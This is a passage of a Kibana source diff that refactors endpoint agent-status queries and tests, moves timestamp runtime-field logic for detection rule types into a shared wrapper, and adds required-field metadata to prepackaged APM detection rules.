b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts @@ -18,28 +18,10 @@ export const expectedCompleteUnitedIndexQuery = { }, }, filter: [ - { - terms: { - 'united.agent.policy_id': ['test-endpoint-policy-id'], - }, - }, - { - exists: { - field: 'united.endpoint.agent.id', - }, - }, - { - exists: { - field: 'united.agent.agent.id', - }, - }, - { - term: { - 'united.agent.active': { - value: true, - }, - }, - }, + { terms: { 'united.agent.policy_id': ['test-endpoint-policy-id'] } }, + { exists: { field: 'united.endpoint.agent.id' } }, + { exists: { field: 'united.agent.agent.id' } }, + { term: { 'united.agent.active': { value: true } } }, ], }, }, @@ -53,15 +35,7 @@ export const expectedCompleteUnitedIndexQuery = { filter: [ { bool: { - should: [ - { - range: { - 'united.agent.last_checkin': { - lt: 'now-300s', - }, - }, - }, - ], + should: [{ range: { 'united.agent.last_checkin': { lt: 'now-300s' } } }], minimum_should_match: 1, }, }, @@ -168,6 +142,22 @@ export const expectedCompleteUnitedIndexQuery = { minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [ + { + exists: { + field: 'united.agent.policy_revision_idx', + }, + }, + ], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -191,9 +181,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { should: [ { - exists: { - field: 'united.agent.upgrade_started_at', - }, + exists: { field: 'united.agent.upgrade_started_at' }, }, ], minimum_should_match: 1, @@ -204,11 +192,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, + { exists: { field: 'united.agent.upgraded_at' } }, ], minimum_should_match: 1, }, @@ -223,11 +207,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, + { exists: { field: 'united.agent.last_checkin' } }, ], minimum_should_match: 1, }, @@ -237,15 +217,23 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, + { exists: { field: 'united.agent.unenrollment_started_at' } }, ], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [ + { exists: { field: 'united.agent.policy_revision_idx' } }, + ], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -268,11 +256,7 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - match: { - 'united.agent.last_checkin_status': 'error', - }, - }, + { match: { 'united.agent.last_checkin_status': 'error' } }, ], minimum_should_match: 1, }, @@ -280,11 +264,7 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - match: { - 'united.agent.last_checkin_status': 'degraded', - }, - }, + { match: { 'united.agent.last_checkin_status': 'degraded' } }, ], minimum_should_match: 1, }, @@ -305,9 +285,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { should: [ { - exists: { - field: 'united.agent.upgrade_started_at', - }, + exists: { field: 'united.agent.upgrade_started_at' }, }, ], minimum_should_match: 1, @@ -318,11 +296,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, + { exists: { field: 'united.agent.upgraded_at' } }, ], minimum_should_match: 1, }, @@ -337,11 +311,7 @@ export const expectedCompleteUnitedIndexQuery = { must_not: { bool: { should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, + { exists: { field: 'united.agent.last_checkin' } }, ], minimum_should_match: 1, }, @@ -351,15 +321,23 @@ export const expectedCompleteUnitedIndexQuery = { { bool: { should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, + { exists: { field: 'united.agent.unenrollment_started_at' } }, ], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [ + { exists: { field: 'united.agent.policy_revision_idx' } }, + ], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -381,13 +359,7 @@ export const expectedCompleteUnitedIndexQuery = { filter: [ { bool: { - should: [ - { - exists: { - field: 'united.agent.upgrade_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgrade_started_at' } }], minimum_should_match: 1, }, }, @@ -395,13 +367,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgraded_at' } }], minimum_should_match: 1, }, }, @@ -414,13 +380,7 @@ export const expectedCompleteUnitedIndexQuery = { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, - ], + should: [{ exists: { field: 'united.agent.last_checkin' } }], minimum_should_match: 1, }, }, @@ -428,16 +388,20 @@ export const expectedCompleteUnitedIndexQuery = { }, { bool: { - should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.unenrollment_started_at' } }], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [{ exists: { field: 'united.agent.policy_revision_idx' } }], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -449,13 +413,7 @@ export const expectedCompleteUnitedIndexQuery = { }, { bool: { - should: [ - { - exists: { - field: 'united.endpoint.host.os.name', - }, - }, - ], + should: [{ exists: { field: 'united.endpoint.host.os.name' } }], minimum_should_match: 1, }, }, diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts index f3c5c6b542de5..7f89444b21fa5 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts +++ b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/support/agent_status.test.ts @@ -93,7 +93,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['healthy']; const kuery = buildStatusesKuery(status); const expected = - '(not (united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) )) AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*)))'; + '(not (united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*) )) AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*)))'; expect(kuery).toEqual(expected); }); @@ -101,7 +101,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['offline']; const kuery = buildStatusesKuery(status); const expected = - '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) ))'; + '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*) ))'; expect(kuery).toEqual(expected); }); @@ -109,7 +109,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['unhealthy']; const kuery = buildStatusesKuery(status); const expected = - '((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*)))'; + '((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*)))'; expect(kuery).toEqual(expected); }); @@ -117,7 +117,7 @@ describe('test filtering endpoint hosts by agent status', () => { const status = ['updating']; const kuery = buildStatusesKuery(status); const expected = - '(((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))'; + '(((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))'; expect(kuery).toEqual(expected); }); @@ -132,7 +132,7 @@ describe('test filtering endpoint hosts by agent status', () => { const statuses = ['offline', 'unhealthy']; const kuery = buildStatusesKuery(statuses); const expected = - '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) ) OR (united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*)))'; + '(united.agent.last_checkin < now-300s AND not ((united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*))) AND not ( ((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*) ) OR (united.agent.last_checkin_status:error or united.agent.last_checkin_status:degraded) AND not (((united.agent.upgrade_started_at:*) and not (united.agent.upgraded_at:*)) or (not (united.agent.last_checkin:*)) or (united.agent.unenrollment_started_at:*) or (not united.agent.policy_revision_idx:*)))'; expect(kuery).toEqual(expected); }); }); diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts b/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts index 0b2a7e9c986a0..eb06b7b6f5f5e 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts +++ b/x-pack/plugins/security_solution/server/endpoint/routes/resolver/tree/queries/stats.ts @@ -211,7 +211,7 @@ export class StatsQuery { [id]: { total: alertCount + otherEvents.total, byCategory: { - alerts: alertCount, + alert: alertCount, ...otherEvents.byCategory, }, }, @@ -222,7 +222,7 @@ export class StatsQuery { [id]: { total: alertCount, byCategory: { - alerts: alertCount, + alert: alertCount, }, }, }; diff --git a/x-pack/plugins/security_solution/server/features.ts b/x-pack/plugins/security_solution/server/features.ts index fa9d94a260ce6..c962e9fbf2d87 100644 --- a/x-pack/plugins/security_solution/server/features.ts +++ b/x-pack/plugins/security_solution/server/features.ts @@ -29,7 +29,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => { cases: [APP_ID], privileges: { all: { - api: ['casesSuggestUserProfiles'], + api: ['casesSuggestUserProfiles', 'bulkGetUserProfiles'], app: [CASES_FEATURE_ID, 'kibana'], catalogue: [APP_ID], cases: { @@ -45,6 +45,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => { ui: casesCapabilities.all, }, read: { + api: ['bulkGetUserProfiles'], app: [CASES_FEATURE_ID, 'kibana'], catalogue: [APP_ID], cases: { diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts index e733f36d1421a..9bc72854e0e22 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/routes/rules/preview_rules_route.ts @@ -185,6 +185,7 @@ export const previewRulesRoute = async ( | 'getContext' | 'hasContext' >; + hasReachedAlertLimit: () => boolean; done: () => { getRecoveredAlerts: () => [] }; } ) => { @@ -284,7 +285,11 @@ export const previewRulesRoute = async ( queryAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'saved_query': @@ -297,7 +302,11 @@ export const previewRulesRoute = async ( savedQueryAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'threshold': @@ -310,7 +319,11 @@ export const previewRulesRoute = async ( thresholdAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'threat_match': @@ -323,7 +336,11 @@ export const previewRulesRoute = async ( threatMatchAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'eql': @@ -334,7 +351,11 @@ export const previewRulesRoute = async ( eqlAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'machine_learning': @@ -345,7 +366,11 @@ export const previewRulesRoute = async ( mlAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; case 'new_terms': @@ -356,7 +381,11 @@ export const previewRulesRoute = async ( newTermsAlertType.name, previewRuleParams, () => true, - { create: alertInstanceFactoryStub, done: () => ({ getRecoveredAlerts: () => [] }) } + { + create: alertInstanceFactoryStub, + hasReachedAlertLimit: () => false, + done: () => ({ getRecoveredAlerts: () => [] }), + } ); break; default: diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts index f2f023e28da7d..992db3ec1e89a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/__mocks__/rule_type.ts @@ -76,6 +76,7 @@ export const createRuleTypeMocks = ( scopedClusterClient: elasticsearchServiceMock.createScopedClusterClient(), alertFactory: { create: jest.fn(() => ({ scheduleActions })), + hasReachedAlertLimit: () => false, done: jest.fn().mockResolvedValue({}), }, findAlerts: jest.fn(), // TODO: does this stay? diff --git a/x-pack/plugins/lens/public/assets/annotation_icons/index.tsx b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/constants.ts similarity index 75% rename from x-pack/plugins/lens/public/assets/annotation_icons/index.tsx rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/constants.ts index 9e641d495582f..0cf5cf1a303a5 100644 --- a/x-pack/plugins/lens/public/assets/annotation_icons/index.tsx +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/constants.ts @@ -5,5 +5,4 @@ * 2.0. */ -export { IconCircle } from './circle'; -export { IconTriangle } from './triangle'; +export const TIMESTAMP_RUNTIME_FIELD = 'kibana.combined_timestamp' as const; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts index 6487a6ec96bf2..87d3091fe6309 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/create_security_rule_type_wrapper.ts @@ -36,6 +36,8 @@ import aadFieldConversion from '../routes/index/signal_aad_mapping.json'; import { extractReferences, injectReferences } from '../signals/saved_object_references'; import { withSecuritySpan } from '../../../utils/with_security_span'; import { getInputIndex, DataViewError } from '../signals/get_input_output_index'; +import { TIMESTAMP_RUNTIME_FIELD } from './constants'; +import { buildTimestampRuntimeMapping } from './utils/build_timestamp_runtime_mapping'; /* eslint-disable complexity */ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper = @@ -137,6 +139,22 @@ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper = ? TIMESTAMP : undefined; + // If we have a timestampOverride, we'll compute a runtime field that emits the override for each document if it exists, + // otherwise it emits @timestamp. If we don't have a timestamp override we don't want to pay the cost of using a + // runtime field, so we just use @timestamp directly. + const { aggregatableTimestampField, timestampRuntimeMappings } = + secondaryTimestamp && timestampOverride + ? { + aggregatableTimestampField: TIMESTAMP_RUNTIME_FIELD, + timestampRuntimeMappings: buildTimestampRuntimeMapping({ + timestampOverride, + }), + } + : { + aggregatableTimestampField: primaryTimestamp, + timestampRuntimeMappings: undefined, + }; + /** * Data Views Logic * Use of data views is supported for all rules other than ML. @@ -292,7 +310,10 @@ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper = completeRule, inputIndex, exceptionItems, - runtimeMappings, + runtimeMappings: { + ...runtimeMappings, + ...timestampRuntimeMappings, + }, searchAfterSize, tuple, bulkCreate, @@ -304,6 +325,7 @@ export const createSecurityRuleTypeWrapper: CreateSecurityRuleTypeWrapper = primaryTimestamp, secondaryTimestamp, ruleExecutionLogger, + aggregatableTimestampField, }, }); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts index 36caeeb2a9229..213f22720a9dd 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/create_new_terms_alert_type.ts @@ -28,10 +28,6 @@ import { buildRecentTermsAgg, buildNewTermsAgg, } from './build_new_terms_aggregation'; -import { - buildTimestampRuntimeMapping, - TIMESTAMP_RUNTIME_FIELD, -} from './build_timestamp_runtime_mapping'; import type { SignalSource } from '../../signals/types'; import { validateImmutable, validateIndexPatterns } from '../utils'; import { parseDateString, validateHistoryWindowStart } from './utils'; @@ -127,6 +123,7 @@ export const createNewTermsAlertType = ( runtimeMappings, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }, services, params, @@ -172,18 +169,6 @@ export const createNewTermsAlertType = ( searchErrors: [], }; - // If we have a timestampOverride, we'll compute a runtime field that emits the override for each document if it exists, - // otherwise it emits @timestamp. If we don't have a timestamp override we don't want to pay the cost of using a - // runtime field, so we just use @timestamp directly. - const { timestampField, timestampRuntimeMappings } = params.timestampOverride - ? { - timestampField: TIMESTAMP_RUNTIME_FIELD, - timestampRuntimeMappings: buildTimestampRuntimeMapping({ - timestampOverride: params.timestampOverride, - }), - } - : { timestampField: '@timestamp', timestampRuntimeMappings: undefined }; - // There are 2 conditions that mean we're finished: either there were still too many alerts to create // after deduplication and the array of alerts was truncated before being submitted to ES, or there were // exactly enough new alerts to hit maxSignals without truncating the array of alerts. We check both because @@ -246,14 +231,11 @@ export const createNewTermsAlertType = ( } = await singleSearchAfter({ aggregations: buildNewTermsAgg({ newValueWindowStart: tuple.from, - timestampField, + timestampField: aggregatableTimestampField, field: params.newTermsFields[0], include: includeValues, }), - runtimeMappings: { - ...runtimeMappings, - ...timestampRuntimeMappings, - }, + runtimeMappings, searchAfterSortIds: undefined, index: inputIndex, // For Phase 2, we expand the time range to aggregate over the history window @@ -292,14 +274,11 @@ export const createNewTermsAlertType = ( searchErrors: docFetchSearchErrors, } = await singleSearchAfter({ aggregations: buildDocFetchAgg({ - timestampField, + timestampField: aggregatableTimestampField, field: params.newTermsFields[0], include: actualNewTerms, }), - runtimeMappings: { - ...runtimeMappings, - ...timestampRuntimeMappings, - }, + runtimeMappings, searchAfterSortIds: undefined, index: inputIndex, // For phase 3, we go back to aggregating only over the rule interval - excluding the history window diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts index 5c8426e194f0d..cacc2f91a925f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/threshold/create_threshold_alert_type.ts @@ -76,6 +76,7 @@ export const createThresholdAlertType = ( primaryTimestamp, secondaryTimestamp, ruleExecutionLogger, + aggregatableTimestampField, }, services, startedAt, @@ -98,6 +99,7 @@ export const createThresholdAlertType = ( runtimeMappings, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }); return result; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts index d2ed6965a547a..6b83b1f06a7d3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/types.ts @@ -71,6 +71,7 @@ export interface RunOpts { mergeStrategy: ConfigType['alertMergeStrategy']; primaryTimestamp: string; secondaryTimestamp?: string; + aggregatableTimestampField: string; } export type SecurityAlertType< diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/__snapshots__/build_timestamp_runtime_mapping.test.ts.snap diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.test.ts similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.test.ts rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.test.ts diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.ts similarity index 92% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.ts rename to x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.ts index 9c33aaab48e7f..3a45402b467fc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/new_terms/build_timestamp_runtime_mapping.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/build_timestamp_runtime_mapping.ts @@ -6,8 +6,7 @@ */ import type * as estypes from '@elastic/elasticsearch/lib/api/types'; - -export const TIMESTAMP_RUNTIME_FIELD = 'kibana.combined_timestamp' as const; +import { TIMESTAMP_RUNTIME_FIELD } from '../constants'; export const buildTimestampRuntimeMapping = ({ timestampOverride, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts index 2bded307e1753..5d2dcd4a4b3d2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rule_types/utils/index.ts @@ -26,3 +26,4 @@ export const createResultObject = (state: TState) export * from './get_list_client'; export * from './validate_mutated_params'; +export * from './build_timestamp_runtime_mapping'; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json index 3a87caa3cbc6e..fe996c9a52ae5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_403_response_to_a_post.json @@ -17,6 +17,18 @@ "references": [ "https://en.wikipedia.org/wiki/HTTP_403" ], + "required_fields": [ + { + "ecs": true, + "name": "http.request.method", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + } + ], "risk_score": 47, "rule_id": "a87a4e42-1d82-44bd-b0bf-d9b7f91fb89e", "severity": "medium", @@ -26,5 +38,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json index e5cbb4ea5f632..3ec10342abae7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_405_response_method_not_allowed.json @@ -17,6 +17,13 @@ "references": [ "https://en.wikipedia.org/wiki/HTTP_405" ], + "required_fields": [ + { + "ecs": true, + "name": "http.response.status_code", + "type": "long" + } + ], "risk_score": 47, "rule_id": "75ee75d8-c180-481c-ba88-ee50129a6aef", "severity": "medium", @@ -26,5 +33,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json index 434462fb4b7ef..acefc9042bb06 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_null_user_agent.json @@ -35,6 +35,13 @@ "references": [ "https://en.wikipedia.org/wiki/User_agent" ], + "required_fields": [ + { + "ecs": true, + "name": "url.path", + "type": "wildcard" + } + ], "risk_score": 47, "rule_id": "43303fd4-4839-4e48-b2b2-803ab060758d", "severity": "medium", @@ -44,5 +51,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json index f85d7420ac48f..00bf495bc7ce7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/apm_sqlmap_user_agent.json @@ -17,6 +17,13 @@ "references": [ "http://sqlmap.org/" ], + "required_fields": [ + { + "ecs": true, + "name": "user_agent.original", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d49cc73f-7a16-4def-89ce-9fc7127d7820", "severity": "medium", @@ -26,5 +33,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/application_added_to_google_workspace_domain.json 